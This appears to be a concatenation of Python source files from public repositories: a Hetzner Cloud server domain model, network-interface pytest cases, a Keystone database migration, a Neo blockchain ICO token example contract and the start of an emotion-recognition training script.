# tone_input=json.load(tone_json),
# content_type='application/json').get_result()
# print(json.dumps(tone, indent=2))
# print("\ntone() example 5:\n")
# with open(join(dirname(__file__),
# '../resources/tone-example-html.json')) as tone_html:
# tone = service.tone(
# json.load(tone_html)['text'], content_type='text/html').get_result()
# print(json.dumps(tone, indent=2))
# print("\ntone() example 6 with GDPR support:\n")
# service.set_detailed_response(True)
# with open(join(dirname(__file__),
# '../resources/tone-example-html.json')) as tone_html:
# tone = service.tone(
# json.load(tone_html)['text'],
# content_type='text/html',
# headers={
# 'Custom-Header': 'custom_value'
# })
# print(tone)
# print(tone.get_headers())
# print(tone.get_result())
# print(tone.get_status_code())
# service.set_detailed_response(False)
# print("\ntone() example 7:\n")
test_tone="Hi Team, The times are difficult! Our sales have been disappointing for the past three quarters for our data analytics product suite. We have a competitive data analytics product suite in the industry. However, we are not doing a good job at selling it, and this is really frustrating.We are missing critical sales opportunities. We cannot blame the economy for our lack of execution. Our clients need analytical tools to change their current business outcomes. In fact, it is in times such as this, our clients want to get the insights they need to turn their businesses around. It is disheartening to see that we are failing at closing deals, in such a hungry market. Let's buckle up and execute.<NAME>akerSales Leader, North-East region"
tone_input = ToneInput(test_tone)
result = service.tone(tone_input=tone_input, content_type="application/json").get_result()
# print(type(json.dumps(tone, indent=2)))
pprint(result) | 2.15625 | 2 |
hcloud/servers/domain.py | usmannasir/hcloud-python | 1 | 6813 | <gh_stars>1-10
# -*- coding: utf-8 -*-
from hcloud.core.domain import BaseDomain
from hcloud.helpers.descriptors import ISODateTime
class Server(BaseDomain):
"""Server Domain
:param id: int
ID of the server
:param name: str
Name of the server (must be unique per project and a valid hostname as per RFC 1123)
:param status: str
Status of the server Choices: `running`, `initializing`, `starting`, `stopping`, `off`, `deleting`, `migrating`, `rebuilding`, `unknown`
:param created: datetime
Point in time when the server was created
:param public_net: :class:`PublicNetwork <hcloud.servers.domain.PublicNetwork>`
Public network information.
:param server_type: :class:`BoundServerType <hcloud.server_types.client.BoundServerType>`
:param datacenter: :class:`BoundDatacenter <hcloud.datacenters.client.BoundDatacenter>`
:param image: :class:`BoundImage <hcloud.images.client.BoundImage>`, None
:param iso: :class:`BoundIso <hcloud.isos.client.BoundIso>`, None
:param rescue_enabled: bool
True if rescue mode is enabled: Server will then boot into rescue system on next reboot.
:param locked: bool
True if server has been locked and is not available to user.
:param backup_window: str, None
Time window (UTC) in which the backup will run, or None if the backups are not enabled
:param outgoing_traffic: int, None
Outbound Traffic for the current billing period in bytes
:param ingoing_traffic: int, None
Inbound Traffic for the current billing period in bytes
:param included_traffic: int
Free Traffic for the current billing period in bytes
:param protection: dict
Protection configuration for the server
:param labels: dict
User-defined labels (key-value pairs)
:param volumes: List[:class:`BoundVolume <hcloud.volumes.client.BoundVolume>`]
Volumes assigned to this server.
"""
STATUS_RUNNING = "running"
"""Server Status running"""
STATUS_INIT = "initializing"
"""Server Status initializing"""
STATUS_STARTING = "starting"
"""Server Status starting"""
STATUS_STOPPING = "stopping"
"""Server Status stopping"""
STATUS_OFF = "off"
"""Server Status off"""
STATUS_DELETING = "deleting"
"""Server Status deleting"""
STATUS_MIGRATING = "migrating"
"""Server Status migrating"""
STATUS_REBUILDING = "rebuilding"
"""Server Status rebuilding"""
STATUS_UNKNOWN = "unknown"
"""Server Status unknown"""
__slots__ = (
"id",
"name",
"status",
"public_net",
"server_type",
"datacenter",
"image",
"iso",
"rescue_enabled",
"locked",
"backup_window",
"outgoing_traffic",
"ingoing_traffic",
"included_traffic",
"protection",
"labels",
"volumes",
)
created = ISODateTime()
supported_fields = ("created",)
def __init__(
self,
id,
name=None,
status=None,
created=None,
public_net=None,
server_type=None,
datacenter=None,
image=None,
iso=None,
rescue_enabled=None,
locked=None,
backup_window=None,
outgoing_traffic=None,
ingoing_traffic=None,
included_traffic=None,
protection=None,
labels=None,
volumes=None,
):
self.id = id
self.name = name
self.status = status
self.created = created
self.public_net = public_net
self.server_type = server_type
self.datacenter = datacenter
self.image = image
self.iso = iso
self.rescue_enabled = rescue_enabled
self.locked = locked
self.backup_window = backup_window
self.outgoing_traffic = outgoing_traffic
self.ingoing_traffic = ingoing_traffic
self.included_traffic = included_traffic
self.protection = protection
self.labels = labels
self.volumes = volumes
class CreateServerResponse(BaseDomain):
"""Create Server Response Domain
:param action: :class:`BoundServer <hcloud.servers.client.BoundServer>`
The created server
:param action: :class:`BoundAction <hcloud.actions.client.BoundAction>`
Shows the progress of the server creation
:param next_actions: List[:class:`BoundAction <hcloud.actions.client.BoundAction>`]
Additional actions like a `start_server` action after the server creation
:param root_password: str, None
The root password of the server if no SSH-Key was given on server creation
"""
__slots__ = (
"server",
"action",
"next_actions",
"root_password"
)
def __init__(
self,
server, # type: BoundServer
action, # type: BoundAction
next_actions, # type: List[Action]
root_password # type: str
):
self.server = server
self.action = action
self.next_actions = next_actions
self.root_password = <PASSWORD>
class ResetPasswordResponse(BaseDomain):
"""Reset Password Response Domain
:param action: :class:`BoundAction <hcloud.actions.client.BoundAction>`
Shows the progress of the server passwort reset action
:param root_password: str
The root password of the server
"""
__slots__ = (
"action",
"root_password"
)
def __init__(
self,
action, # type: BoundAction
root_password # type: str
):
self.action = action
self.root_password = root_password
class EnableRescueResponse(BaseDomain):
"""Enable Rescue Response Domain
:param action: :class:`BoundAction <hcloud.actions.client.BoundAction>`
Shows the progress of the server enable rescue action
:param root_password: str
The root password of the server in the rescue mode
"""
__slots__ = (
"action",
"root_password"
)
def __init__(
self,
action, # type: BoundAction
root_password # type: str
):
self.action = action
self.root_password = <PASSWORD>
class RequestConsoleResponse(BaseDomain):
"""Request Console Response Domain
:param action: :class:`BoundAction <hcloud.actions.client.BoundAction>`
Shows the progress of the server request console action
:param wss_url: str
URL of websocket proxy to use. This includes a token which is valid for a limited time only.
:param password: str
VNC password to use for this connection. This password only works in combination with a wss_url with valid token.
"""
__slots__ = (
"action",
"wss_url",
"password"
)
def __init__(
self,
action, # type: BoundAction
wss_url, # type: str
password, # type: str
):
self.action = action
self.wss_url = wss_url
self.password = password
class PublicNetwork(BaseDomain):
"""Public Network Domain
:param ipv4: :class:`IPv4Address <hcloud.servers.domain.IPv4Address>`
:param ipv6: :class:`IPv6Network <hcloud.servers.domain.IPv6Network>`
:param floating_ips: List[:class:`BoundFloatingIP <hcloud.floating_ips.client.BoundFloatingIP>`]
"""
__slots__ = (
"ipv4",
"ipv6",
"floating_ips"
)
def __init__(self,
ipv4, # type: IPv4Address
ipv6, # type: IPv6Network
floating_ips, # type: List[BoundFloatingIP]
):
self.ipv4 = ipv4
self.ipv6 = ipv6
self.floating_ips = floating_ips
class IPv4Address(BaseDomain):
"""IPv4 Address Domain
:param ip: str
The IPv4 Address
:param blocked: bool
Determine if the IP is blocked
:param dns_ptr: str
DNS PTR for the ip
"""
__slots__ = (
"ip",
"blocked",
"dns_ptr"
)
def __init__(self,
ip, # type: str
blocked, # type: bool
dns_ptr, # type: str
):
self.ip = ip
self.blocked = blocked
self.dns_ptr = dns_ptr
class IPv6Network(BaseDomain):
"""IPv6 Network Domain
:param ip: str
The IPv6 Network as CIDR Notation
:param blocked: bool
Determine if the Network is blocked
:param dns_ptr: dict
DNS PTR Records for the Network as Dict
:param network: str
The network without the network mask
:param network_mask: str
The network mask
"""
__slots__ = (
"ip",
"blocked",
"dns_ptr",
"network",
"network_mask"
)
def __init__(self,
ip, # type: str
blocked, # type: bool
dns_ptr, # type: list
):
self.ip = ip
self.blocked = blocked
self.dns_ptr = dns_ptr
ip_parts = self.ip.split("/") # 2001:db8::/64 to 2001:db8:: and 64
self.network = ip_parts[0]
self.network_mask = ip_parts[1]
| 2.234375 | 2 |
AutomationFramework/tests/interfaces/test_if_subif.py | sbarguil/Testing-framework | 1 | 6814 | <reponame>sbarguil/Testing-framework<filename>AutomationFramework/tests/interfaces/test_if_subif.py
import pytest
from AutomationFramework.page_objects.interfaces.interfaces import Interfaces
from AutomationFramework.tests.base_test import BaseTest
class TestInterfacesSubInterfaces(BaseTest):
test_case_file = 'if_subif.yml'
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_description',
'page_object_class': Interfaces}])
def test_if_subif_description(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_enabled',
'page_object_class': Interfaces}])
def test_if_subif_enabled(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_ip_prefix_length',
'page_object_class': Interfaces}])
def test_if_subif_ip_prefix_length(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('multiple_create_page_objects_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_ip_state',
'page_object_rpcs_classes': [Interfaces, Interfaces],
'rpc_clean_order': None,
}])
def test_if_subif_ip_state(self, multiple_create_page_objects):
for page_object in multiple_create_page_objects:
page_object.execute_interface_rpc()
assert page_object.validate_rpc(), page_object.get_test_case_description()
@pytest.mark.parametrize('multiple_create_page_objects_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_origin',
'page_object_rpcs_classes': [Interfaces, Interfaces],
'rpc_clean_order': None,
}])
def test_if_subif_origin(self, multiple_create_page_objects):
for page_object in multiple_create_page_objects:
page_object.execute_interface_rpc()
assert page_object.validate_rpc(), page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_dhcp_client',
'page_object_class': Interfaces}])
def test_if_subif_dhcp_client(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_mtu',
'page_object_class': Interfaces}])
def test_if_subif_mtu(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_vlan_id',
'page_object_class': Interfaces}])
def test_if_subif_vlan_id(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_inner_outer_vlan_id',
'page_object_class': Interfaces}])
def test_if_subif_inner_outer_vlan_id(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_match_vlan_id',
'page_object_class': Interfaces}])
def test_if_subif_match_vlan_id(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
| 2.234375 | 2 |
keystone/common/sql/migrate_repo/versions/001_add_initial_tables.py | sanket4373/keystone | 0 | 6815 | <reponame>sanket4373/keystone
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sqlalchemy as sql
def upgrade(migrate_engine):
# Upgrade operations go here. Don't create your own engine; bind
# migrate_engine to your metadata
meta = sql.MetaData()
meta.bind = migrate_engine
# catalog
service_table = sql.Table(
'service',
meta,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('type', sql.String(255)),
sql.Column('extra', sql.Text()))
service_table.create(migrate_engine, checkfirst=True)
endpoint_table = sql.Table(
'endpoint',
meta,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('region', sql.String(255)),
sql.Column('service_id',
sql.String(64),
sql.ForeignKey('service.id'),
nullable=False),
sql.Column('extra', sql.Text()))
endpoint_table.create(migrate_engine, checkfirst=True)
# identity
role_table = sql.Table(
'role',
meta,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('name', sql.String(255), unique=True, nullable=False))
role_table.create(migrate_engine, checkfirst=True)
if migrate_engine.name == 'ibm_db_sa':
# NOTE(blk-u): SQLAlchemy for PostgreSQL picks the name tenant_name_key
# for the unique constraint, but for DB2 doesn't give the UC a name
# unless we tell it to and there is no DDL to alter a column to drop
# an unnamed unique constraint, so this code creates a named unique
# constraint on the name column rather than an unnamed one.
# (This is used in migration 16.)
tenant_table = sql.Table(
'tenant',
meta,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('name', sql.String(64), nullable=False),
sql.Column('extra', sql.Text()),
sql.UniqueConstraint('name', name='tenant_name_key'))
else:
tenant_table = sql.Table(
'tenant',
meta,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('name', sql.String(64), unique=True, nullable=False),
sql.Column('extra', sql.Text()))
tenant_table.create(migrate_engine, checkfirst=True)
metadata_table = sql.Table(
'metadata',
meta,
sql.Column('user_id', sql.String(64), primary_key=True),
sql.Column('tenant_id', sql.String(64), primary_key=True),
sql.Column('data', sql.Text()))
metadata_table.create(migrate_engine, checkfirst=True)
ec2_credential_table = sql.Table(
'ec2_credential',
meta,
sql.Column('access', sql.String(64), primary_key=True),
sql.Column('secret', sql.String(64)),
sql.Column('user_id', sql.String(64)),
sql.Column('tenant_id', sql.String(64)))
ec2_credential_table.create(migrate_engine, checkfirst=True)
if migrate_engine.name == 'ibm_db_sa':
# NOTE(blk-u): SQLAlchemy for PostgreSQL picks the name user_name_key
# for the unique constraint, but for DB2 doesn't give the UC a name
# unless we tell it to and there is no DDL to alter a column to drop
# an unnamed unique constraint, so this code creates a named unique
# constraint on the name column rather than an unnamed one.
# (This is used in migration 16.)
user_table = sql.Table(
'user',
meta,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('name', sql.String(64), nullable=False),
sql.Column('extra', sql.Text()),
sql.UniqueConstraint('name', name='user_name_key'))
else:
user_table = sql.Table(
'user',
meta,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('name', sql.String(64), unique=True, nullable=False),
sql.Column('extra', sql.Text()))
user_table.create(migrate_engine, checkfirst=True)
user_tenant_membership_table = sql.Table(
'user_tenant_membership',
meta,
sql.Column(
'user_id',
sql.String(64),
sql.ForeignKey('user.id'),
primary_key=True),
sql.Column(
'tenant_id',
sql.String(64),
sql.ForeignKey('tenant.id'),
primary_key=True))
user_tenant_membership_table.create(migrate_engine, checkfirst=True)
# token
token_table = sql.Table(
'token',
meta,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('expires', sql.DateTime()),
sql.Column('extra', sql.Text()))
token_table.create(migrate_engine, checkfirst=True)
def downgrade(migrate_engine):
# Operations to reverse the above upgrade go here.
meta = sql.MetaData()
meta.bind = migrate_engine
tables = ['user_tenant_membership', 'token', 'user', 'tenant', 'role',
'metadata', 'ec2_credential', 'endpoint', 'service']
for t in tables:
table = sql.Table(t, meta, autoload=True)
table.drop(migrate_engine, checkfirst=True)
| 1.710938 | 2 |
boa3_test/examples/ico.py | DanPopa46/neo3-boa | 0 | 6816 | <gh_stars>0
from typing import Any, List, Union
from boa3.builtin import NeoMetadata, metadata, public
from boa3.builtin.contract import Nep17TransferEvent
from boa3.builtin.interop.blockchain import get_contract
from boa3.builtin.interop.contract import GAS, NEO, call_contract
from boa3.builtin.interop.runtime import calling_script_hash, check_witness
from boa3.builtin.interop.storage import delete, get, put
from boa3.builtin.type import UInt160
# -------------------------------------------
# METADATA
# -------------------------------------------
@metadata
def manifest_metadata() -> NeoMetadata:
"""
Defines this smart contract's metadata information
"""
meta = NeoMetadata()
meta.author = "<NAME>, <NAME> and <NAME>. COZ in partnership with Simpli"
meta.description = "ICO Example"
meta.email = "<EMAIL>"
return meta
# -------------------------------------------
# Storage Key Prefixes
# -------------------------------------------
KYC_WHITELIST_PREFIX = b'KYCWhitelistApproved'
TOKEN_TOTAL_SUPPLY_PREFIX = b'TokenTotalSupply'
TRANSFER_ALLOWANCE_PREFIX = b'TransferAllowancePrefix_'
# -------------------------------------------
# TOKEN SETTINGS
# -------------------------------------------
# Script hash of the contract owner
TOKEN_OWNER = UInt160()
# Symbol of the Token
TOKEN_SYMBOL = 'ICO'
# Number of decimal places
TOKEN_DECIMALS = 8
# Initial Supply of tokens in the system
TOKEN_INITIAL_SUPPLY = 10_000_000 * 100_000_000 # 10m total supply * 10^8 (decimals)
# -------------------------------------------
# Events
# -------------------------------------------
on_transfer = Nep17TransferEvent
# -------------------------------------------
# Methods
# -------------------------------------------
@public
def verify() -> bool:
"""
When this contract address is included in the transaction signature,
this method will be triggered as a VerificationTrigger to verify that the signature is correct.
For example, this method needs to be called when withdrawing token from the contract.
:return: whether the transaction signature is correct
"""
return is_administrator()
def is_administrator() -> bool:
"""
Validates if the invoker has administrative rights
:return: whether the contract's invoker is an administrator
"""
return check_witness(TOKEN_OWNER)
def is_valid_address(address: UInt160) -> bool:
"""
Validates if the address passed through the kyc.
:return: whether the given address is validated by kyc
"""
return get(KYC_WHITELIST_PREFIX + address).to_int() > 0
@public
def deploy() -> bool:
"""
Initializes the storage when the smart contract is deployed.
:return: whether the deploy was successful. This method must return True only during the smart contract's deploy.
"""
if not check_witness(TOKEN_OWNER):
return False
if get(TOKEN_TOTAL_SUPPLY_PREFIX).to_int() > 0:
return False
put(TOKEN_TOTAL_SUPPLY_PREFIX, TOKEN_INITIAL_SUPPLY)
put(TOKEN_OWNER, TOKEN_INITIAL_SUPPLY)
on_transfer(None, TOKEN_OWNER, TOKEN_INITIAL_SUPPLY)
return True
@public
def mint(amount: int) -> bool:
"""
Mints new tokens
:param amount: the amount of gas to be refunded
:type amount: int
:return: whether the refund was successful
"""
assert amount >= 0
if not is_administrator():
return False
if amount > 0:
current_total_supply = totalSupply()
owner_balance = balanceOf(TOKEN_OWNER)
put(TOKEN_TOTAL_SUPPLY_PREFIX, current_total_supply + amount)
put(TOKEN_OWNER, owner_balance + amount)
on_transfer(None, TOKEN_OWNER, amount)
post_transfer(None, TOKEN_OWNER, amount, None)
return True
@public
def refund(address: UInt160, neo_amount: int, gas_amount: int) -> bool:
"""
Refunds an address with given Neo and Gas
:param address: the address that have the tokens
:type address: UInt160
:param neo_amount: the amount of neo to be refunded
:type neo_amount: int
:param gas_amount: the amount of gas to be refunded
:type gas_amount: int
:return: whether the refund was successful
"""
assert len(address) == 20
assert neo_amount > 0 or gas_amount > 0
if not is_administrator():
return False
if neo_amount > 0:
result = call_contract(NEO, 'transfer', [calling_script_hash, address, neo_amount, None])
if result != True:
# due to a current limitation in the neo3-boa, changing the condition to `not result`
# will result in a compiler error
return False
if gas_amount > 0:
result = call_contract(GAS, 'transfer', [calling_script_hash, address, gas_amount, None])
if result != True:
# due to a current limitation in the neo3-boa, changing the condition to `not result`
# will result in a compiler error
return False
return True
# -------------------------------------------
# Public methods from NEP5.1
# -------------------------------------------
@public
def symbol() -> str:
"""
Gets the symbols of the token.
This symbol should be short (3-8 characters is recommended), with no whitespace characters or new-lines and should
be limited to the uppercase latin alphabet (i.e. the 26 letters used in English).
This method must always return the same value every time it is invoked.
:return: a short string symbol of the token managed in this contract.
"""
return TOKEN_SYMBOL
@public
def decimals() -> int:
"""
Gets the amount of decimals used by the token.
E.g. 8, means to divide the token amount by 100,000,000 (10 ^ 8) to get its user representation.
This method must always return the same value every time it is invoked.
:return: the number of decimals used by the token.
"""
return TOKEN_DECIMALS
@public
def totalSupply() -> int:
"""
Gets the total token supply deployed in the system.
This number mustn't be in its user representation. E.g. if the total supply is 10,000,000 tokens, this method
must return 10,000,000 * 10 ^ decimals.
:return: the total token supply deployed in the system.
"""
return get(TOKEN_TOTAL_SUPPLY_PREFIX).to_int()
@public
def balanceOf(account: UInt160) -> int:
"""
Get the current balance of an address
The parameter account should be a 20-byte address.
:param account: the account address to retrieve the balance for
:type account: UInt160
:return: the token balance of the `account`
:raise AssertionError: raised if `account` length is not 20.
"""
assert len(account) == 20
return get(account).to_int()
@public
def transfer(from_address: UInt160, to_address: UInt160, amount: int, data: Any) -> bool:
"""
Transfers a specified amount of NEP17 tokens from one account to another
If the method succeeds, it must fire the `transfer` event and must return true, even if the amount is 0,
or from and to are the same address.
:param from_address: the address to transfer from
:type from_address: UInt160
:param to_address: the address to transfer to
:type to_address: UInt160
:param amount: the amount of NEP17 tokens to transfer
:type amount: int
:param data: whatever data is pertinent to the onPayment method
:type data: Any
:return: whether the transfer was successful
:raise AssertionError: raised if `from_address` or `to_address` length is not 20 or if `amount` if less than zero.
"""
# the parameters from and to should be 20-byte addresses. If not, this method should throw an exception.
assert len(from_address) == 20 and len(to_address) == 20
# the parameter amount must be greater than or equal to 0. If not, this method should throw an exception.
assert amount >= 0
# The function MUST return false if the from account balance does not have enough tokens to spend.
from_balance = get(from_address).to_int()
if from_balance < amount:
return False
# The function should check whether the from address equals the caller contract hash.
# If so, the transfer should be processed;
# If not, the function should use the check_witness to verify the transfer.
if from_address != calling_script_hash:
if not check_witness(from_address):
return False
# skip balance changes if transferring to yourself or transferring 0 cryptocurrency
if from_address != to_address and amount != 0:
if from_balance == amount:
delete(from_address)
else:
put(from_address, from_balance - amount)
to_balance = get(to_address).to_int()
put(to_address, to_balance + amount)
# if the method succeeds, it must fire the transfer event
on_transfer(from_address, to_address, amount)
# if the to_address is a smart contract, it must call the contracts onPayment
post_transfer(from_address, to_address, amount, data)
# and then it must return true
return True
def post_transfer(from_address: Union[UInt160, None], to_address: Union[UInt160, None], amount: int, data: Any):
"""
Checks if the one receiving NEP17 tokens is a smart contract and if it's one the onPayment method will be called
:param from_address: the address of the sender
:type from_address: UInt160
:param to_address: the address of the receiver
:type to_address: UInt160
:param amount: the amount of cryptocurrency that is being sent
:type amount: int
:param data: any pertinent data that might validate the transaction
:type data: Any
"""
if not isinstance(to_address, None): # TODO: change to 'is not None' when `is` semantic is implemented
contract = get_contract(to_address)
if not isinstance(contract, None): # TODO: change to 'is not None' when `is` semantic is implemented
call_contract(to_address, 'onPayment', [from_address, amount, data])
@public
def allowance(from_address: UInt160, to_address: UInt160) -> int:
"""
Returns the amount of tokens that the to account can transfer from the from account.
:param from_address: the address that have the tokens
:type from_address: UInt160
:param to_address: the address that is authorized to use the tokens
:type to_address: UInt160
:return: the amount of tokens that the `to` account can transfer from the `from` account
:raise AssertionError: raised if `from_address` or `to_address` length is not 20.
"""
# the parameters from and to should be 20-byte addresses. If not, this method should throw an exception.
assert len(from_address) == 20 and len(to_address) == 20
return get(TRANSFER_ALLOWANCE_PREFIX + from_address + to_address).to_int()
@public
def transferFrom(originator: UInt160, from_address: UInt160, to_address: UInt160, amount: int, data: Any) -> bool:
"""
Transfers an amount from the `from` account to the `to` account if the `originator` has been approved to transfer
the requested amount.
:param originator: the address where the actual token is
:type originator: UInt160
:param from_address: the address to transfer from with originator's approval
:type from_address: UInt160
:param to_address: the address to transfer to
:type to_address: UInt160
:param amount: the amount of NEP17 tokens to transfer
:type amount: int
:param data: any pertinent data that might validate the transaction
:type data: Any
:return: whether the transfer was successful
:raise AssertionError: raised if `from_address` or `to_address` length is not 20 or if `amount` if less than zero.
"""
# the parameters from and to should be 20-byte addresses. If not, this method should throw an exception.
assert len(originator) == 20 and len(from_address) == 20 and len(to_address) == 20
# the parameter amount must be greater than or equal to 0. If not, this method should throw an exception.
assert amount >= 0
# The function should check whether the from address equals the caller contract hash.
# If so, the transfer should be processed;
# If not, the function should use the check_witness to verify the transfer.
if from_address != calling_script_hash:
if not check_witness(from_address):
return False
approved_transfer_amount = allowance(originator, from_address)
if approved_transfer_amount < amount:
return False
originator_balance = balanceOf(originator)
if originator_balance < amount:
return False
# update allowance between originator and from
if approved_transfer_amount == amount:
delete(TRANSFER_ALLOWANCE_PREFIX + originator + from_address)
else:
put(TRANSFER_ALLOWANCE_PREFIX + originator + from_address, approved_transfer_amount - amount)
# skip balance changes if transferring to yourself or transferring 0 cryptocurrency
if amount != 0 and from_address != to_address:
# update originator's balance
if originator_balance == amount:
delete(originator)
else:
put(originator, originator_balance - amount)
# updates to's balance
to_balance = get(to_address).to_int()
put(to_address, to_balance + amount)
# if the method succeeds, it must fire the transfer event
on_transfer(from_address, to_address, amount)
# if the to_address is a smart contract, it must call the contracts onPayment
post_transfer(from_address, to_address, amount, data)
# and then it must return true
return True
@public
def approve(originator: UInt160, to_address: UInt160, amount: int) -> bool:
"""
Approves the to account to transfer amount tokens from the originator account.
:param originator: the address that have the tokens
:type originator: UInt160
:param to_address: the address that is authorized to use the tokens
:type to_address: UInt160
:param amount: the amount of NEP17 tokens to transfer
:type amount: int
:return: whether the approval was successful
:raise AssertionError: raised if `originator` or `to_address` length is not 20 or if `amount` if less than zero.
"""
assert len(originator) == 20 and len(to_address) == 20
assert amount >= 0
if not check_witness(originator):
return False
if originator == to_address:
return False
if not is_valid_address(originator) or not is_valid_address(to_address):
# one of the address doesn't passed the kyc yet
return False
if balanceOf(originator) < amount:
return False
put(TRANSFER_ALLOWANCE_PREFIX + originator + to_address, amount)
return True
# -------------------------------------------
# Public methods from KYC
# -------------------------------------------
@public
def kyc_register(addresses: List[UInt160]) -> int:
"""
Includes the given addresses to the kyc whitelist
:param addresses: a list with the addresses to be included
:return: the number of included addresses
"""
included_addresses = 0
if is_administrator():
for address in addresses:
if len(address) == 20:
kyc_key = KYC_WHITELIST_PREFIX + address
put(kyc_key, True)
included_addresses += 1
return included_addresses
@public
def kyc_remove(addresses: List[UInt160]) -> int:
"""
Removes the given addresses from the kyc whitelist
:param addresses: a list with the addresses to be removed
:return: the number of removed addresses
"""
removed_addresses = 0
if is_administrator():
for address in addresses:
if len(address) == 20:
kyc_key = KYC_WHITELIST_PREFIX + address
delete(kyc_key)
removed_addresses += 1
return removed_addresses
| 1.570313 | 2 |
emotion_recognition.py | Partaourides/SERN | 10 | 6817 | import os
# Restrict the script to run on CPU
os.environ ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = ""
# Import Keras Tensoflow Backend
# from keras import backend as K
import tensorflow as tf
# Configure it to use only specific CPU Cores
config = tf.ConfigProto(intra_op_parallelism_threads=4,
inter_op_parallelism_threads=4,
device_count={"CPU": 1, "GPU": 0},
allow_soft_placement=True)
# import tensorflow as tf
import numpy as np
from IEOMAP_dataset_AC import dataset, IeomapSentenceIterator
from sklearn.metrics import confusion_matrix
from models_AC import SentenceModel
import json
import os
def emotion_recognition(n_run, epochs, batch_size, embedding_size, first_rnn_size, dropout, embedding, num_speakers):
########################################################################################################################
# Hyper-parameters
########################################################################################################################
split_size = 0.8 # Split proportion of train and test data
#log_dir = './logs_AC/RNN_without_ID/1'
log_dir = './logs_AC/RNN_' \
+ str(num_speakers) + '/' + str(n_run) + '/'
#log_dir = './logs_AC/RNN_' + embedding + 'Emb' + str(embedding_size) + '_1layer' + str(2*first_rnn_size) + '/' + str(n_run)
train_log_dir = log_dir + 'train'
val_log_dir = log_dir + 'val'
########################################################################################################################
# Initialize the Data set
########################################################################################################################
sentences, targets, data_info, speakers = dataset(mode='sentences', embedding=embedding, embedding_size=embedding_size)
train_data = IeomapSentenceIterator(sentences[0], targets[0], data_info['sentences_length'][0], speakers[0])
val_data = IeomapSentenceIterator(sentences[1], targets[1], data_info['sentences_length'][1], speakers[1])
test_data = IeomapSentenceIterator(sentences[2], targets[2], data_info['sentences_length'][2], speakers[2])
########################################################################################################################
# Initialize the model
########################################################################################################################
g = SentenceModel(vocab_size=(data_info['vocabulary_size'] + 1),
embedding_size=embedding_size,
first_rnn_size=first_rnn_size,
num_classes=data_info['num_classes'],
dropout=dropout,
embedding=embedding,
num_speakers=num_speakers)
# Store model setup
model_setup = {'vocab_size': (data_info['vocabulary_size'] + 1),
'embedding_size': embedding_size,
'first_rnn_size': first_rnn_size,
'num_classes': data_info['num_classes'],
'dropout': dropout,
'embedding': embedding,
'num_speakers': num_speakers}
dirname = os.path.dirname(log_dir)
if not os.path.exists(dirname):
os.makedirs(dirname)
with open(log_dir + 'model_setup.p', 'w') as file:
json.dump(model_setup, file, indent=4)
########################################################################################################################
# Initialize the parameters
########################################################################################################################
sess = tf.Session(config=config)
sess.run(tf.global_variables_initializer())
sess.run(tf.local_variables_initializer())
saver = tf.train.Saver()
epoch = 0
best_epoch = 0
train_conf_matrix = 0
val_conf_matrix = 0
test_conf_matrix = 0
best_acc = 0
########################################################################################################################
# Performance Indicators
########################################################################################################################
writer_train = tf.summary.FileWriter(train_log_dir, sess.graph)
writer_val = tf.summary.FileWriter(val_log_dir)
accuracy_tf = tf.placeholder(tf.float32, [])
precision_tf = tf.placeholder(tf.float32, [])
recall_tf = tf.placeholder(tf.float32, [])
summary_op = tf.summary.scalar('accuracy', accuracy_tf)
summary_op = tf.summary.scalar('precision', precision_tf)
summary_op = tf.summary.scalar('recall', recall_tf)
########################################################################################################################
# Model training procedure
########################################################################################################################
while train_data.epoch < epochs: # and train_data.epoch < best_epoch + 20:
sentences_batch, sentences_length_batch, targets_batch, speakers_batch = train_data.next_batch(batch_size)
